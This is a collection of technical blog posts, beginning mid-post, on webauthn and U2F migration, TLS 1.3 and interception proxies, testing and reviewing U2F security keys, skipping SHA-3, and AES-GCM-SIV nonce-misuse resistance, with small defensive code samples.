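                  u2f_app_id: Optional[str] = None) -> bool:
    """Check the 32-byte hash that begins the authenticator data.

    If the appid extension was requested, also accept the hash of the
    old U2F AppID.
    """
    presented = authenticator_data[:32]
    if len(presented) != 32:
        return False
    candidates = [hashlib.sha256(rp_id.encode("utf-8")).digest()]
    if u2f_app_id is not None:
        candidates.append(hashlib.sha256(u2f_app_id.encode("utf-8")).digest())
    return any(hmac.compare_digest(presented, c) for c in candidates)
```

A stricter server could record, per key, whether it was registered via U2F and only accept the AppID hash for those keys.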

There is no way to create a U2F key with webauthn, however. So if you roll out webauthn support, have users create keys with webauthn, and then have to roll it back for some reason, those new keys will not work with the U2F API. So complete the transition of your login process to webauthn first, then transition registration.

Concluding remarks

It’s exciting to see webauthn support coming to most browsers this year. I get to use Security Keys with about the same number of sites as I use SMS OTP with, and I use Security Keys anywhere I can. While I, like everyone technical, assume that I’m less likely to get phished than most, I’m still human. So I hope that widespread support for webauthn encourages more sites to support Security Keys.

Challenges remain, though. Probably the most obvious is that NFC is the ideal interface for mobile devices, but it doesn’t work with iOS. Bluetooth works for both Android and iOS, but requires a battery and isn’t as frictionless.

Security keys will probably remain the domain of the more security-conscious in the short term since, with CTAP1, they can only be an additional authentication step. But I hope to see CTAP2 tokens generally available this year with fingerprint readers or PIN support. It might be that, in a few years' time, a significant number of people have a passwordless experience with at least one site that they use regularly. That’ll be exciting.

TLS 1.3 and Proxies

I'll generally ignore the internet froth in a given week as much as possible, but when Her Majesty's Government starts repeating misunderstandings about TLS 1.3 it is necessary to write something, if only to have a pointer ready for when people start citing it as evidence.

The first misunderstanding in the piece is the claim that it's possible for man-in-the-middle proxies to selectively proxy TLS 1.2 connections, but not TLS 1.3 connections because the latter encrypts certificates.

The TLS 1.2 proxy behaviour that's presumed here is the following: the proxy forwards the client's ClientHello message to the server and inspects the resulting ServerHello and certificates. Based on the name in the certificate, the proxy may “drop out” of the connection (i.e. allow the client and server to communicate directly) or may choose to interpose itself, answering the client with an alternative ServerHello and the server with an alternative ClientKeyExchange, negotiating different encrypted sessions with each and forwarding so that it can see the plaintext of the connection. In order to satisfy the client in this case the client must trust the proxy, but that's taken care of in the enterprise setting by installing a root CA on the client. (Or, in Syria, by hoping that users click through the certificate error.)

While there do exist products that attempt to do this, they break repeatedly because it's a fundamentally flawed design: by forwarding the ClientHello to the server, the proxy has committed to supporting every feature that the client advertises because, if the server selects a given feature, it's too late for the proxy to change its mind. Therefore, with every new cipher suite, new curve, and new extension introduced, a proxy that does this finds that it cannot understand the connection that it's trying to interpose.

One option that some proxies take is to try to heuristically detect when they can't support a connection and fail open. However, if you believe that your proxy is a strong defense against something then failing open is a bit of a problem.

Thus another avenue that some proxies have tried is to use the same heuristics to detect unsupported connections, discard the incomplete, outgoing connection, and start another by sending a ClientHello that only includes features that the proxy supports. That's unfortunate for the server because it doubles its handshaking cost, but gives the proxy a usable connection.

However, both those tricks only slow down the rate at which customers lurch from outage to outage. The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet.

So the idea that selective proxying based on the server certificate ever functioned is false. A proxy can, with all versions of TLS, examine a ClientHello and decide to proxy the connection or not but, if it does so, it must craft a fresh ClientHello to send to the server containing only features that it supports. Making assumptions about any TLS message after a ClientHello that you didn't craft is invalid. Since, in practice, this has not been as obvious as the designers of TLS had imagined, the 1.3 draft has a section laying out these requirements.

Sadly, it's precisely this sort of proxy misbehaviour that has delayed TLS 1.3 for over a year while my colleagues (David Benjamin and Steven Valdez) repeatedly deployed experiments and measured success rates of different serialisations. In the end we found that making TLS 1.3 look like a TLS 1.2 resumption solved a huge number of problems, suggesting that many proxies blindly pass through such connections. (Which should, again, make one wonder about what security properties they're providing.)

But, given all that, you might ponder why we bothered encrypting certificates? Partly it's one component of an effort to make browsing more private but, more concretely, it's because anything not encrypted suffers these problems. TLS 1.3 was difficult to deploy because TLS's handshake is, perforce, exposed to the network. The idea that we should make TLS a little more efficient by compressing certificates has been bouncing around for many years. But it's only with TLS 1.3 that we might make it happen because everyone expected to hit another swamp of proxy issues if we tried it without encrypting certificates first.

It's also worth examining the assumption behind waiting for the server certificate before making an interception decision: that the client might be malicious and attempt to fool the proxy but (to quote the article) the certificate is “tightly bound to the server we’re actually interacting with”. The problem here is that a certificate for any given site, and a valid signature over a ServerKeyExchange from that certificate, is easily available: just connect to the server and it'll send it to you. Therefore if you're worried about malware, how is it that the malware C&C server won't just reply with a certificate for a reputable site? The malware client, after all, can be crafted to compensate for any such trickery. Unless the proxy is interposing and performing the cryptographic checks, then the server certificate isn't tightly bound to anything at all and the whole reason for the design seems flawed.

On that subject, I'll briefly mention the fact that HTTPS proxies aren't always so great at performing cryptographic checks. (We recently notified a major proxy vendor that their product didn't appear to validate certificates at all. We were informed that they can validate certificates, it's just disabled by default. It's unclear what fraction of their customers are aware of that.)

Onto the second claim of the article: that TLS 1.3 is incompatible with PCI-DSS (credit card standards) and HIPAA (US healthcare regulation). No reasoning is given for the claim, so let's take a look:

Many PCI-DSS compliant systems use TLS 1.2, primarily stemming from requirement 4.1: “use strong cryptography and security protocols to safeguard sensitive cardholder data during transmission over open, public networks, including a) only trusted keys and certificates are accepted, b) the protocol in use only supports secure versions or configurations, and c) the encryption strength is appropriate for the encryption methodology in use”.

As you can see, the PCI-DSS requirements are general enough to adapt to new versions of TLS and, if TLS 1.2 is sufficient, then TLS 1.3 is better. (Even those misunderstanding aspects of TLS 1.3 are saying it's stronger than 1.2.)

HIPAA is likewise general, requiring that one must “implement technical security measures to guard against unauthorized access to electronic protected health information that is being transmitted over an electronic communications network”.

TLS 1.3 is enabled in Chrome 65, which is rolling out now. It is a major improvement in TLS and lets us eliminate session-ticket encryption keys as a mass-decryption threat, which both PCI-DSS- and HIPAA-compliance experts should take great interest in. It does not require special measures by proxies—they need only implement TLS 1.2 correctly.

Testing Security Keys

Last time I reviewed various security keys at a fairly superficial level: basic function, physical characteristics etc. This post considers lower-level behaviour.

Security Keys implement the FIDO U2F spec, which borrows a lot from ISO 7816-4. Each possible transport (i.e. USB, NFC, or Bluetooth) has its own spec for how to encapsulate the U2F messages over that transport (e.g. here's the USB one). FIDO is working on much more complex (and more capable) second versions of these specs, but currently all security keys implement the basic ones.

In essence, the U2F spec only contains three functions: Register, Authenticate, and Check. Register creates a new key-pair. Authenticate signs with an existing key-pair, after the user confirms physical presence, and Check confirms whether or not a key-pair is known to a security key.

In more detail, Register takes a 32-byte challenge and a 32-byte appID. These are intended to be SHA-256 hashes, but are opaque and can be anything. The challenge acts as a nonce, while the appID is bound to the resulting key and represents the context of the key. For web browsers, the appID is the hash of a URL in the origin of the login page.
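A small sketch of how a browser-like caller might derive the two 32-byte values. The function name and the example inputs are hypothetical, and treating the challenge as the hash of a client-data JSON blob is my reading of how browsers use U2F rather than something the token itself can check.

```python
import hashlib


def u2f_parameters(client_data_json: bytes, app_id_url: str) -> tuple:
    """Return (challenge, appID) as the 32-byte values handed to the token."""
    challenge_param = hashlib.sha256(client_data_json).digest()
    app_param = hashlib.sha256(app_id_url.encode("utf-8")).digest()
    return challenge_param, app_param


# Hypothetical inputs for illustration only.
challenge, app_id = u2f_parameters(
    b'{"challenge":"...","origin":"https://example.com"}',
    "https://example.com",
)
```

Since the token treats both values as opaque, nothing stops a test harness from passing arbitrary 32-byte strings instead.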

Register returns a P-256 public key, an opaque key handle, the security key's batch certificate, and a signature, made with the private key that corresponds to the public key in the certificate, over the challenge, appID, key handle, and public key. Since the security keys are small devices with limited storage, it's universally the case in the ones that I've looked at that the key handle is actually an encrypted private key, i.e. the token offloads storage of private keys. However, in theory, the key handle could just be an integer that indexes storage within the token.

Authenticate takes a challenge, an appID, and a key handle, verifies that the appID matches the value given to Register, and returns a signature, from the private key associated with that key handle, over the challenge and appID.
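To make the signed message concrete, here is a sketch of the byte string that an Authenticate signature covers. The layout (appID, a user-presence byte, a 4-byte big-endian counter, then the challenge) is my recollection of the U2F raw message format and goes slightly beyond the summary above, so check it against the spec before relying on it. The function name is made up.

```python
import struct


def authenticate_signed_data(
    app_param: bytes, user_presence: int, counter: int, challenge_param: bytes
) -> bytes:
    """Assemble the message that the Authenticate signature is computed over."""
    if len(app_param) != 32 or len(challenge_param) != 32:
        raise ValueError("appID and challenge must each be 32 bytes")
    return (
        app_param
        + bytes([user_presence])      # 0x01 when the button was pressed
        + struct.pack(">I", counter)  # signature counter, big-endian
        + challenge_param
    )
```

A verifier would rebuild this string from the values that it expects and check the ECDSA signature over it with the public key returned by Register.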

Check takes a key handle and an appID and returns a positive result if the key handle came from this security key and the appID matches.

Given that, there are a number of properties that should hold. Some of the most critical:

But there are a number of other things that would be nice to test:

So given all those desirable properties, how do various security keys manage?

Yubico

Easy one first: I can find no flaws in Yubico's U2F Security Key.

VASCO SecureClick

I've acquired one of these since the round-up of security keys that I did last time so I'll give a full introduction here. (See also Brad's review.)

This is a Bluetooth Low-Energy (BLE) token, which means that it works with both Android and iOS devices. For non-mobile devices, it includes a USB-A BLE dongle. The SecureClick uses a Chrome extension for configuring and pairing the dongle, which works across platforms. The dongle appears as a normal USB device until it sees a BLE signal from the token, at which point it “disconnects” and reconnects as a different device for actually doing the U2F operation. Once an operation that requires user-presence (i.e. a Register or Authenticate) has completed, the token powers down and the dongle disconnects and reconnects as the original USB device again.

If you're using Linux and you configure udev to grant access to the vendor ID & product ID of the token as it appears normally, nothing will work because the vendor ID and product ID are different when it's active. The Chrome extension will get very confused about this.

However, once I'd figured that out, everything else worked well. The problem, as is inherent with BLE devices, is that the token needs a battery that will run out eventually. (It takes a CR2012 and can be replaced.) VASCO claims that it can be used 10 times a day for two years, which seems plausible. I did run the battery out during testing, but testing involves a lot of operations. As with the Yubico, I did not find any problems with this token.

I did have it working with iOS, but it didn't work when I tried to check the battery level just now, and I'm not sure what changed. (Perhaps iOS 11?)

Feitian ePass

ASN.1 DER is designed to be a “distinguished” encoding, i.e. there should be a unique serialisation for a given value and all other representations are invalid. As such, numbers are supposed to be encoded minimally, with no leading zeros (unless necessary to make a number positive). Feitian doesn't get that right with this security key: numbers that start with 9 leading zero bits have an invalid zero byte at the beginning. Presumably, numbers starting with 17 zero bits have two invalid zero bytes at the beginning and so on, but I wasn't able to press the button enough times to get such an example. Thus something like one in 256 signatures produced by this security key is invalid.
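The minimal-encoding rule is easy to state in code. This is a sketch of the check rather than the code that I used for testing; `content` is assumed to be just the value bytes of a DER INTEGER, with the tag and length already stripped.

```python
def is_minimal_der_integer(content: bytes) -> bool:
    """Check that the value bytes of a DER INTEGER are minimally encoded."""
    if len(content) == 0:
        return False  # an INTEGER needs at least one byte
    if len(content) > 1:
        # A leading zero byte is only valid if it is needed to keep the
        # number positive, i.e. if the next byte has its top bit set.
        if content[0] == 0x00 and content[1] < 0x80:
            return False
        # Likewise, a leading 0xff is redundant for a negative number
        # whose next byte already has its top bit set.
        if content[0] == 0xFF and content[1] >= 0x80:
            return False
    return True
```

A 256-bit value with 9 leading zero bits serialises to 32 bytes that begin 0x00 followed by a byte below 0x80, which is exactly the case that this rejects.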

Also, the final eight bytes of the key handle seem to be superfluous: you can change them to whatever value you like and the security key doesn't care. That is not immediately a problem, but it does raise the question: if they're not being used, what are they?

Lastly, the padding data in USB packets isn't zeroed. However, it's obviously just the previous contents of the transmit buffer, so there's nothing sensitive getting leaked.

Thetis

With this device, I can't test things like key handle mutability and whether the appID is being checked because of some odd behaviour. The response to the first Check is invalid, according to the spec: it returns status 0x9000 (“NO_ERROR”), when it should be 0x6985 or 0x6a80. After that, it starts rejecting all key handles (even valid ones) with 0x6a80 until it's unplugged and reinserted.

This device has the same non-minimal signature encoding issue as the Feitian ePass. Also, if you click too fast, this security key gets upset and rejects a few requests with status 0x6ffe.

USB padding bytes aren't zeroed, but appear to be parts of the request message and thus nothing interesting.

U2F Zero

A 1KiB ping message crashes this device (i.e. it stops responding to USB messages and needs to be unplugged and reinserted). Testing a corrupted key handle also crashes it and thus I wasn't able to run many tests.

KEY-ID / HyperFIDO

The Key-ID (and HyperFIDO devices, which have the same firmware, I think) have the same non-minimal encoding issue as the Feitian ePass, but also have a second ASN.1 flaw. In ASN.1 DER, if the most-significant bit of a number is set, that number is negative. If it's not supposed to be negative, then a zero pad byte is needed. I think what happened here is that, when testing the most-significant bit, the security key checks whether the first byte is > 0x80, but it should be checking whether it's >= 0x80. The upshot is that sometimes it produces signatures that contain negative numbers and are thus invalid.
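Here is a sketch of that suspected off-by-one. The `buggy` flag reproduces my guess at the firmware's comparison, not anything that I've confirmed from its source, and the function names are invented.

```python
def der_integer_content(value: int, buggy: bool = False) -> bytes:
    """Encode a non-negative integer as the value bytes of a DER INTEGER."""
    if value < 0:
        raise ValueError("only non-negative values are handled here")
    raw = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    # A zero pad byte is needed whenever the top bit of the first byte is set.
    needs_pad = raw[0] > 0x80 if buggy else raw[0] >= 0x80
    return b"\x00" + raw if needs_pad else raw


def decode_signed(content: bytes) -> int:
    """Interpret DER INTEGER value bytes as a two's-complement number."""
    return int.from_bytes(content, "big", signed=True)


# A 256-bit value whose first byte is exactly 0x80 hits the edge case.
edge = 0x80 << 248
assert decode_signed(der_integer_content(edge)) == edge
assert decode_signed(der_integer_content(edge, buggy=True)) < 0
```

Only a first byte of exactly 0x80 triggers the difference, which is why the bad signatures show up only occasionally.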

USB padding bytes aren't zeroed, and include data that was not part of the request or response. It's unlikely to be material, but it does raise the question of where it comes from.

The wrapped keys also have some unfortunate properties. Firstly, bytes 16 through 31 are a function of the device and the appID, thus a given site can passively identify the same token when used by different accounts. Bytes 48 through 79 are unauthenticated and, when altered, everything still works except the signatures are wrong. That suggests that these bytes are the encrypted private key (or the encrypted seed to generate it). It's not obvious that there's any vulnerability from being able to tweak the private key like this, but all bytes of the key handle should be authenticated as a matter of best practice. Lastly, bytes 32 through 47 can't be arbitrarily manipulated, but can be substituted with the same bytes from a different key handle, which causes the signatures to be incorrect. I don't know what's going on there.

Overall, the key handle structure is sufficiently far from the obvious construction to cause worry, but not an obvious vulnerability.

Security Keys

Security Keys are (generally) USB-connected hardware fobs that are capable of key generation and oracle signing. Websites can “enroll” a security key by asking it to generate a public key bound to an “appId” (which is limited by the browser based on the site's origin). Later, when a user wants to log in, the website can send a challenge to the security key, which signs it to prove possession of the corresponding private key. By having a physical button, which must be pressed to enroll or sign, operations can't happen without user involvement. By having the security keys encrypt state and hand it to the website to store, they can be stateless(*) and robust.

(* well, they can almost be stateless, but there's a signature counter in the spec. Hopefully it'll go away in a future revision for that and other reasons.)

The point is that security keys are unphishable: a phisher can only get a signature for their appId which, because it's based on the origin, has to be invalid for the real site. Indeed, a user cannot be socially engineered into compromising themselves with a security key, short of them physically giving it to the attacker. This is a step up from app- or SMS-based two-factor authentication, which only solves password reuse. (And SMS has other issues.)

The W3C standard for security keys is still a work in progress, but sites can use them via the FIDO API today. In Chrome you can load an implementation of that API which forwards requests to an internal extension that handles the USB communication. If you do that, then there's a Firefox extension that implements the same API by running a local binary to handle it. (Although the Firefox extension appears to stop working with Firefox 57, based on reports.)

Google, GitHub, Facebook and Dropbox (and others) all support security keys this way. If you administer a G Suite domain, you can require security keys for your users. (“G Suite” is the new name for Gmail etc on a custom domain.)

But, to get all this, you need an actual security key, and probably two of them if you want a backup. (And a backup is a good idea, especially if you plan on dropping your phone number for account recovery.) So I did a search on Amazon for “U2F security key” and bought everything on the first page of results that was under $20 and available to ship now.

(Update: Brad Hill set up a page on GitHub that includes these reviews and his own.)

Yubico Security Key

Brand: Yubico, Firmware: Yubico, Chip: NXP, Price: $17.99, Connection: USB-A

Yubico is the leader in this space and their devices are the most common. They have a number of more expensive and more capable devices that some people might be familiar with, but this one only does U2F. The sensor is capacitive so a light touch is sufficient to trigger it. You'll have no problems with this key, but it is the most expensive of the under $20 set.

Thetis U2F Security Key

Brand: Thetis, Firmware: Excelsecu, Chip: ?, Price: $13.95, Connection: USB-A

This security key is fashioned more like a USB thumb drive. The plastic inner part rotates within the outer metal shell and so the USB connector can be protected by it. The button is in the axis and is clicky, rather than capacitive, but doesn't require too much force to press. If you'll be throwing your security key in bags and worry about damaging it then perhaps this one will work well for you.

A minor nit is that the attestation certificate is signed with SHA-1. That doesn't really matter, but it suggests that the firmware writers aren't paying as much attention as one would hope. (I.e. it's a brown M&M.)

Feitian ePass

Brand: Feitian, Firmware: Feitian, Chip: NXP, Price: $16.99, Connection: USB-A, NFC

This one is very much like the Yubico, just a little fatter around the middle. Otherwise, it's also a sealed plastic body and capacitive touch sensor. The differences are a dollar and NFC support—which should let it work with Android. However, I haven't tested this feature.

I don't know what the opposite of a brown M&M is, but this security key is the only one here that has its metadata correctly registered with the FIDO Metadata Service.

U2F Zero

Brand: U2F Zero, Firmware: Conor Patrick, Chip: Atmel, Price: $8.99, Connection: USB-A

I did bend the rules a little to include this one: it wasn't immediately available when I did the main order from Amazon. But it's the only token on Amazon that has open source firmware (and hardware designs), and that was worth waiting for. It's also the cheapest of all the options here.

Sadly, I have to report that I can't quite recommend it because, in my laptop (a Chromebook Pixel), it's not thick enough to sit in the USB port correctly: since it only has the “tongue” of a USB connector, it can move around in the port a fair bit. That's true of the other tokens too, but with the U2F Zero, unless I hold it just right, it fails to make proper contact. Since operating it requires pressing the button, it's almost unusable in my laptop.

However, it's fine with a couple of USB hubs that I have and in my desktop computer, so it might be fine for you. Depends how much you value the coolness factor of it being open-source.

KEY-ID FIDO U2F Security Key

Brand: KEY-ID, Firmware: Feitian(?), Chip: ?, Price: $12.00, Connection: USB-A

I photographed this one while plugged in in order to show the most obvious issue with this device: everyone will know when you're using it! Whenever it's plugged in, the green LED on the end is lit up and, although the saturation in the photo exaggerates the situation a little, it really is too bright. When it's waiting for a touch, it starts flashing too.

In addition, whenever I remove this from my desktop computer, the computer reboots. That suggests an electrical issue with the device itself—it's probably shorting something that shouldn't be shorted, like the USB power pin to ground, for example.

While this device is branded “KEY-ID”, I believe that the firmware is done by Feitian. There are similarities in the certificate that match the Feitian device and, if you look up the FIDO certification, you find that Feitian registered a device called “KEY-ID FIDO® U2F Security Key”. Possibly Feitian decided against putting their brand on this.

(Update: Brad Hill, at least, reports no problems with these when using a MacBook.)

HyperFIDO Mini

Brand: HyperFIDO, Firmware: Feitian(?), Chip: ?, Price: $13.75, Connection: USB-A

By observation, this is physically identical to the KEY-ID device, save for the colour. It has the same green LED too (see above).

However, it manages to be worse. The KEY-ID device is highlighted in Amazon as a “new 2017 model”, and maybe this is an example of the older model. Not only does it cause my computer to reliably reboot when removed (I suffered to bring you this review, dear reader), it also causes all devices on a USB hub to stop working when plugged in. When plugged into my laptop it does work, as long as you hold it up in the USB socket. The only saving grace is that, when you aren't pressing it upwards, at least the green LED doesn't light up.

HyperFIDO U2F Security Key

Brand: HyperFIDO, Firmware: Feitian(?), Chip: ?, Price: $9.98, Connection: USB-A

This HyperFIDO device is plastic so avoids the electrical issues of the KEY-ID and HyperFIDO Mini, above. It also avoids having an LED that can blind small children.

However, at least on the one that I received, the plastic USB part is only just small enough to fit into a USB socket. It takes a fair bit of force to insert and remove it. Also the end cap looks like it should be symmetrical and so able to go on either way around, but it doesn't quite work when upside down.

Once inserted, pressing the button doesn't take too much force, but it's enough to make the device bend worryingly in the socket. It doesn't actually appear to be a problem, but it adds a touch of anxiety to each use. Overall, it's cheap and you'll know it.

Those are the devices that matched my initial criteria. But, sometimes, $20 isn't going to be enough I'm afraid. These are some other security keys that I've ended up with:

Yubikey 4C

Brand: Yubico, Firmware: Yubico, Chip: NXP?, Price: $50 (direct from Yubico), Connection: USB-C

If you have a laptop that only has USB-C ports then a USB-A device is useless to you. Currently your only option is the Yubikey 4C at $50 apiece. This works well enough: the “button” is capacitive and triggers when you touch either of the contacts on the sides. The visual indicator is an LED that shines through the plastic at the very end.

Note that, as a full Yubikey, it can do more than just being a security key. Yubico have a site for that.

(Update: several people have mentioned in comments that this device wasn't very robust for them and had physical problems after some months. I can't confirm that, but there's always the option of a USB-A to USB-C adaptor. Just be careful to get one that'll work—the adaptor that I have doesn't hold “tongue-only” USB devices well enough.)

Many people lacking USB-A ports will have a Touch Bar, which includes a fingerprint sensor and secure element. One might spy an alternative (and cheaper) solution there. GitHub have published SoftU2F which does some of that but, from what I can tell, doesn't actually store keys in the secure element yet. However, in time, there might be a good answer for this.

(Update: the behaviour of SoftU2F might be changing.)

Yubikey Nano

Brand: Yubico, Firmware: Yubico, Chip: NXP?, Price: $50 (direct from Yubico), Connection: USB-A

Another $50 security key from Yubico, but I've included it because it's my preferred form-factor: this key is designed to sit semi-permanently inside the USB-A port. The edge is a capacitive touch sensor so you can trigger it by running your finger along it.

It does mean that you give up a USB port, but it also means that you're never rummaging around to find it.

(Note: newer Nanos look slightly different. See Yubico's page for a photo of the current design.)

Maybe Skip SHA-3

In 2005 and 2006, a series of significant results were published against SHA-1 [1][2][3]. These repeated breakthroughs caused something of a crisis of faith as cryptographers questioned whether we knew how to build hash functions at all. After all, many hash functions from the 1990s had not aged well [1][2].

In the wake of this, NIST announced (PDF) a competition to develop SHA-3 in order to hedge the risk of SHA-2 falling. In 2012, Keccak (pronounced “ket-chak”, I believe) won (PDF) and became SHA-3. But the competition itself proved that we do know how to build hash functions: the series of results in 2005 didn't extend to SHA-2 and the SHA-3 process produced a number of hash functions, all of which are secure as far as we can tell. Thus, by the time it existed, it was no longer clear that SHA-3 was needed. Yet there is a natural tendency to assume that SHA-3 must be better than SHA-2 because the number is bigger.

As I've mentioned before, diversity of cryptographic primitives is expensive. It contributes to the exponential number of combinations that need to be tested and hardened; it draws on limited developer resources as multiple platforms typically need separate, optimised code; and it contributes to code-size, which is a worry again in the mobile age. SHA-3 is also slow, and is even slower than SHA-2 which is already a comparative laggard amongst crypto primitives.

SHA-3 did introduce something useful: extendable output functions (XOFs), in the form of the SHAKE algorithms. In an XOF, input is hashed and then an (effectively) unlimited amount of output can be produced from it. It's convenient, although the same effect can be produced for a limited amount of output using HKDF, or by hashing to a key and running ChaCha20 or AES-CTR.
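To illustrate the comparison, here is a sketch using only Python's standard library: SHAKE128 as the XOF, and a small HKDF-SHA-256 written out by hand following RFC 5869. The function names are mine, and the HKDF code is for illustration rather than production use.

```python
import hashlib
import hmac


def shake_output(data: bytes, length: int) -> bytes:
    """Hash data with SHAKE128 and squeeze out `length` bytes."""
    return hashlib.shake_128(data).digest(length)


def hkdf_sha256(ikm: bytes, length: int, salt: bytes = b"", info: bytes = b"") -> bytes:
    """HKDF (RFC 5869) with SHA-256; output is capped at 255 * 32 bytes."""
    hash_len = 32
    if length > 255 * hash_len:
        raise ValueError("HKDF-SHA-256 can produce at most 8160 bytes")
    # Extract: concentrate the input keying material into a fixed-size key.
    prk = hmac.new(salt or b"\x00" * hash_len, ikm, hashlib.sha256).digest()
    # Expand: chain HMAC calls, each block feeding into the next.
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


# Asking for more output only extends the stream; it doesn't change the prefix.
assert shake_output(b"seed", 64)[:32] == shake_output(b"seed", 32)
```

The cap in `hkdf_sha256` is the "limited amount of output" caveat: the XOF has no such limit, but 8160 bytes is plenty for deriving keys.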

Thus I believe that SHA-3 should probably not be used. It offers no compelling advantage over SHA-2 and brings many costs. The only argument that I can credit is that it's nice to have a backup hash function, but both SHA-256 and SHA-512 are commonly supported and have different cores. So we already have two secure hash functions deployed and I don't think we need another.

BLAKE2 is another new, secure hash function, but it at least offers much improved speed over SHA-2. Speed is important. Not only does it mean less CPU time spent on cryptography, it means that cryptography can be economically deployed in places where it couldn't be before. BLAKE2, however, has too many versions: eight at the current count (BLAKE2(X)?[sb](p)?). In response to complaints about speed, the Keccak team now have KangarooTwelve and MarsupilamiFourteen, which have a vector-based design for better performance. (Although a vector-based design can also be used to speed up SHA-2.)

So there are some interesting prospects for a future, faster replacement for SHA-2. But SHA-3 itself isn't one of them.

Update: two points came up in discussion about this. Firstly, what about length-extension? SHA-2 has the property that simply hashing a secret with some data is not a secure MAC construction, which is why we have HMAC. SHA-3 does not have this problem.
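In code, the difference between the tempting construction and the safe one is a single line. This is a sketch with hypothetical function names; `naive_mac` is included only to show what not to do with SHA-2.

```python
import hashlib
import hmac


def naive_mac(key: bytes, message: bytes) -> bytes:
    """H(key || message): NOT a secure MAC with SHA-256 (length-extension)."""
    return hashlib.sha256(key + message).digest()


def hmac_sha256(key: bytes, message: bytes) -> bytes:
    """HMAC with SHA-256: the construction to use with SHA-2."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Check a tag in constant time."""
    return hmac.compare_digest(hmac_sha256(key, message), tag)
```

With `naive_mac`, someone who sees a tag for one message can compute a valid tag for that message with extra data appended, without ever knowing the key. HMAC closes that hole.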

That is an advantage of SHA-3 because it means that people who don't know they need to use HMAC (with SHA-2) won't be caught out by it. Hopefully, in time, we end up with a hash function that has that property. But SHA-512/256, BLAKE2, K12, M14 and all the other SHA-3 candidates do have this property. In fact, it's implausible that any future hash function wouldn't.

Overall, I don't feel that solving length-extension is a sufficiently pressing concern that we should all invest in SHA-3 now, rather than a hash function that hopefully comes with more advantages. If it is a major concern for you now, try SHA-512/256—a member of the SHA-2 family.

The second point was that SHA-3 is just the first step towards a permutation-based future: SHA-3 has an elegant foundation that is suitable for implementing the full range of symmetric algorithms. In the future, a single optimised permutation function could be the basis of hashes, MACs, and AEADs, thus saving code size / die area and complexity. (E.g. STROBE.)

But skipping SHA-3 doesn't preclude any of that. SHA-3 is the hash standard itself, and even the Keccak team appear to be pushing K12 rather than SHA-3 now. It seems unlikely that a full set of primitives built around the Keccak permutation would choose to use the SHA-3 parameters at this point.

Indeed, SHA-3 adoption might inhibit that ecosystem by pushing it towards those bad parameters. (There was a thing about NIST tweaking the parameters at the end of the process if you want some background.)

One might argue that SHA-3 should be supported because you believe that it'll result in hardware implementations of the permutation and you hope that they'll be flexible enough to support what you really want to do with it. I'm not sure that would be the best approach even if your goal was to move to a permutation-based world. Instead I would nail down the whole family of primitives as you would like to see it and try to push small chips, where area is a major concern, to adopt it. Even then, the hash function in the family probably wouldn't be exactly SHA-3, but more like K12.

AES-GCM-SIV

AEADs combine encryption and authentication in a way that provides the properties that people generally expect when they “encrypt” something. This is great because, historically, handing people a block cipher and a hash function has resulted in a lot of bad and broken constructions. Standardising AEADs avoids this.

Common AEADs have a sharp edge though: you must never encrypt two different messages with the same key and nonce. Doing so generally violates the confidentiality of the two messages and might break much more.

There are some situations where obtaining a unique nonce is easy, for example in transport security where a simple counter can be used. (Due to poor design in TLS 1.2, some TLS implementations still managed to duplicate nonces. The answer there is to do what ChaCha20-Poly1305 does in TLS 1.2, and what everything does in TLS 1.3: make the nonce implicit. That means that any mistakes result in your code not interoperating, which should be noticed.)

But there are situations where ensuring nonce uniqueness is not trivial, generally where multiple machines are independently encrypting with the same key. A system for distributing nonces is complex and hard to have confidence in. Generating nonces randomly and depending on statistical uniqueness is reasonable, but only if the space of nonces is large enough. XSalsa20-Poly1305 (paper, code) has a 192-bit nonce and good performance across a range of CPUs. In many situations, using that with random nonces is a sound choice.

However, lots of chips now have hardware support for the AES-GCM AEAD, meaning that its performance and power use are hard to beat. Also, a 192-bit nonce results in a ~40% increase in overhead vs the 96-bit nonce of AES-GCM, which is undesirable in some contexts. (Overhead consists of the nonce and tag, thus the increase from 96- to 192-bit nonces is not 100%.)
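To make the overhead arithmetic concrete, here is a small sketch. It assumes a 128-bit tag for both AEADs; the function names are just for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Per-message overhead in bytes: the nonce plus the authentication tag. */
static size_t aead_overhead_bytes(size_t nonce_bits, size_t tag_bits) {
  return (nonce_bits + tag_bits) / 8;
}

/* Percentage increase going from overhead `from` to overhead `to`,
 * rounded down. */
static size_t percent_increase(size_t from, size_t to) {
  assert(from > 0 && to >= from);
  return (to - from) * 100 / from;
}
```

With a 96-bit nonce the overhead is 28 bytes and with a 192-bit nonce it is 40 bytes, so doubling the nonce costs a little over 40%, not 100%.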

But using random nonces in a 96-bit space isn't that comfortable. NIST recommends a limit of 2^32 messages when using random nonces with AES-GCM which, while quite large, is often not large enough that you can stop worrying about it. Because of this, Shay Gueron, Yehuda Lindell and I have been working on AES-GCM-SIV (paper, spec): AES-GCM with some forgiveness. It uses the same primitives as AES-GCM, and thus enjoys the same hardware support, but it doesn't fail catastrophically if you repeat a nonce. Thus you can use random, 96-bit nonces with a far larger number of messages, or withstand a glitch in your nonce distribution scheme. (For precise numbers, see section 5.3 of the paper.)
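For a rough feel of why 96 bits is uncomfortable, the usual birthday approximation says that n random b-bit nonces collide with probability of about n^2 / 2^(b+1), as long as that value is small. The sketch below works in log2 to avoid floating point. The function name is mine and this is only the textbook approximation, not the analysis from the paper.

```c
#include <assert.h>

/* Returns log2 of the approximate birthday bound n^2 / 2^(b+1) on the
 * probability that any two of n = 2^log2_messages uniformly random
 * b-bit nonces collide. Only meaningful while the result is negative. */
static int log2_collision_bound(int log2_messages, int nonce_bits) {
  assert(log2_messages >= 0 && nonce_bits > 0);
  return 2 * log2_messages - (nonce_bits + 1);
}
```

At 2^32 messages a 96-bit nonce gives a bound of about 2^-33, while a 192-bit nonce gives about 2^-129. At 2^48 messages the 96-bit figure has already climbed to about 2^-1.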

There is a performance cost: AES-GCM-SIV encryption runs at about 70% the speed of AES-GCM, although decryption runs at the same speed. (Measured using current BoringSSL on an Intel Skylake chip with 8KiB messages.) But, in any situation where you don't have a watertight argument for nonce uniqueness, that might be pretty cheap compared to the alternative.

